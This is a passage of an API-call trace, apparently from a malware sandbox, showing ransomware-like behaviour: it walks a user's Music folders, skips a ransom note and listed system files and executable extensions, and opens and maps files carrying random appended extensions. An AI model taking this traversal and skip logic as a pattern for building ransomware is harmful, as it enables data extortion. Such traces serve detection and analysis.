halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0185.852] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.852] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.852] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\DECRYPT-FILES.txt") returned 93 [0185.852] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.853] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.853] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*" [0185.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xf17a2ac0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17a2ac0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0185.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.853] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xf17a2ac0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17a2ac0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.854] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17a2ac0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf17a2ac0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17a2ac0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.854] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.854] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.854] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.854] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.854] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.854] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.854] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.854] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.854] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0185.854] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\0a16c9.tmp" [0185.854] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.855] CloseHandle (hObject=0x0) returned 0 [0185.855] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.855] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf18f120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf18f120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.855] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.855] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf5fd380, ftCreationTime.dwHighDateTime=0x1d4cec7, ftLastAccessTime.dwLowDateTime=0xbcdbfd30, ftLastAccessTime.dwHighDateTime=0x1d4d1fa, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4634, dwReserved0=0x0, dwReserved1=0x0, cFileName="gT8583vJq.mp3.wEbcB", cAlternateFileName="GT8583~1.WEB")) returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="DECRYPT-FILES.txt") returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="autorun.inf") returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="boot.ini") returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="desktop.ini") returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="ntuser.dat") returned -1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="iconcache.db") returned -1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="bootsect.bak") returned 1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="ntuser.dat.log") returned -1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="thumbs.db") returned -1 [0185.855] lstrcmpiW (lpString1="gT8583vJq.mp3.wEbcB", lpString2="Bootfont.bin") returned 1 [0185.855] lstrlenW (lpString="gT8583vJq.mp3.wEbcB") returned 19 [0185.855] lstrcmpiW (lpString1="wEbcB", lpString2="lnk") returned 1 [0185.856] lstrcmpiW (lpString1="wEbcB", lpString2="exe") returned 1 [0185.856] lstrcmpiW (lpString1="wEbcB", lpString2="sys") returned 1 [0185.856] lstrcmpiW (lpString1="wEbcB", lpString2="dll") returned 1 [0185.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.856] lstrlenW (lpString="gT8583vJq.mp3.wEbcB") returned 19 [0185.856] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0185.856] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="gT8583vJq.mp3.wEbcB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3.wEbcB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3.wEbcB" [0185.856] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3.wEbcB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\gt8583vjq.mp3.webcb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.856] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=17972) returned 1 [0185.856] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.856] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.857] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.857] CloseHandle (hObject=0x278) returned 1 [0185.857] CloseHandle (hObject=0x274) returned 1 [0185.858] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.858] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa62648c0, ftCreationTime.dwHighDateTime=0x1d4c6c9, ftLastAccessTime.dwLowDateTime=0xfbfbb0f0, ftLastAccessTime.dwHighDateTime=0x1d4c601, ftLastWriteTime.dwLowDateTime=0xaf1db3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13f77, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yz_Genn7GM5k.wav.tVaRSd", cAlternateFileName="YZ_GEN~1.TVA")) returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="DECRYPT-FILES.txt") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="autorun.inf") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="boot.ini") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="desktop.ini") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="ntuser.dat") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="iconcache.db") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="bootsect.bak") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="ntuser.dat.log") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="thumbs.db") returned 1 [0185.858] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav.tVaRSd", lpString2="Bootfont.bin") returned 1 [0185.858] lstrlenW (lpString="Yz_Genn7GM5k.wav.tVaRSd") returned 23 [0185.858] lstrcmpiW (lpString1="tVaRSd", lpString2="lnk") returned 1 [0185.858] lstrcmpiW (lpString1="tVaRSd", lpString2="exe") returned 1 [0185.858] lstrcmpiW (lpString1="tVaRSd", lpString2="sys") returned 1 [0185.858] lstrcmpiW (lpString1="tVaRSd", lpString2="dll") returned 1 [0185.858] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.858] lstrlenW (lpString="Yz_Genn7GM5k.wav.tVaRSd") returned 23 [0185.858] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0185.858] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="Yz_Genn7GM5k.wav.tVaRSd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav.tVaRSd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav.tVaRSd" [0185.858] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav.tVaRSd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\yz_genn7gm5k.wav.tvarsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0185.859] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=81783) returned 1 [0185.859] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0185.859] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.860] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.860] CloseHandle (hObject=0x278) returned 1 [0185.860] CloseHandle (hObject=0x274) returned 1 [0185.860] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.860] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa62648c0, ftCreationTime.dwHighDateTime=0x1d4c6c9, ftLastAccessTime.dwLowDateTime=0xfbfbb0f0, ftLastAccessTime.dwHighDateTime=0x1d4c601, ftLastWriteTime.dwLowDateTime=0xaf1db3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13f77, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yz_Genn7GM5k.wav.tVaRSd", cAlternateFileName="YZ_GEN~1.TVA")) returned 0 [0185.860] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0185.860] CloseHandle (hObject=0x26c) returned 1 [0185.860] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ca7f20, ftCreationTime.dwHighDateTime=0x1d4c86d, ftLastAccessTime.dwLowDateTime=0xde60f3e0, ftLastAccessTime.dwHighDateTime=0x1d4c631, ftLastWriteTime.dwLowDateTime=0xaf201540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb673, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", cAlternateFileName="ZKZJVY~1.5DH")) returned 1 [0185.860] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="DECRYPT-FILES.txt") returned 1 [0185.860] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="autorun.inf") returned 1 [0185.860] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="boot.ini") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="desktop.ini") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="ntuser.dat") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="iconcache.db") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="bootsect.bak") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="ntuser.dat.log") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="thumbs.db") returned 1 [0185.861] lstrcmpiW (lpString1="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", lpString2="Bootfont.bin") returned 1 [0185.861] lstrlenW (lpString="ZKZJVYYHO0E7C 9.m4a.5DhvAsp") returned 27 [0185.861] lstrcmpiW (lpString1="5DhvAsp", lpString2="lnk") returned -1 [0185.861] lstrcmpiW (lpString1="5DhvAsp", lpString2="exe") returned -1 [0185.861] lstrcmpiW (lpString1="5DhvAsp", lpString2="sys") returned -1 [0185.861] lstrcmpiW (lpString1="5DhvAsp", lpString2="dll") returned -1 [0185.861] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.861] lstrlenW (lpString="ZKZJVYYHO0E7C 9.m4a.5DhvAsp") returned 27 [0185.861] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.861] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="ZKZJVYYHO0E7C 9.m4a.5DhvAsp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a.5DhvAsp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a.5DhvAsp" [0185.861] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a.5DhvAsp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\zkzjvyyho0e7c 9.m4a.5dhvasp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.862] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=46707) returned 1 [0185.862] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.862] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.863] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.863] CloseHandle (hObject=0x270) returned 1 [0185.863] CloseHandle (hObject=0x26c) returned 1 [0185.863] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.863] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ca7f20, ftCreationTime.dwHighDateTime=0x1d4c86d, ftLastAccessTime.dwLowDateTime=0xde60f3e0, ftLastAccessTime.dwHighDateTime=0x1d4c631, ftLastWriteTime.dwLowDateTime=0xaf201540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb673, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKZJVYYHO0E7C 9.m4a.5DhvAsp", cAlternateFileName="ZKZJVY~1.5DH")) returned 0 [0185.863] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.863] CloseHandle (hObject=0x264) returned 1 [0185.863] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb6530, ftCreationTime.dwHighDateTime=0x1d4c69c, ftLastAccessTime.dwLowDateTime=0xf5bb65a0, ftLastAccessTime.dwHighDateTime=0x1d4c813, ftLastWriteTime.dwLowDateTime=0xaf24d800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x6f61, dwReserved0=0x0, dwReserved1=0x0, cFileName="a940hnh.wav.BOp1", cAlternateFileName="A940HN~1.BOP")) returned 1 [0185.863] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="DECRYPT-FILES.txt") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="autorun.inf") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="boot.ini") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="desktop.ini") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="ntuser.dat") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="iconcache.db") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="bootsect.bak") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="ntuser.dat.log") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="thumbs.db") returned -1 [0185.864] lstrcmpiW (lpString1="a940hnh.wav.BOp1", lpString2="Bootfont.bin") returned -1 [0185.864] lstrlenW (lpString="a940hnh.wav.BOp1") returned 16 [0185.864] lstrcmpiW (lpString1="BOp1", lpString2="lnk") returned -1 [0185.864] lstrcmpiW (lpString1="BOp1", lpString2="exe") returned -1 [0185.864] lstrcmpiW (lpString1="BOp1", lpString2="sys") returned -1 [0185.864] lstrcmpiW (lpString1="BOp1", lpString2="dll") returned -1 [0185.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.864] lstrlenW (lpString="a940hnh.wav.BOp1") returned 16 [0185.864] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0185.864] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="a940hnh.wav.BOp1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav.BOp1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav.BOp1" [0185.864] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.864] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav.BOp1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\a940hnh.wav.bop1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.865] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=28513) returned 1 [0185.865] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, 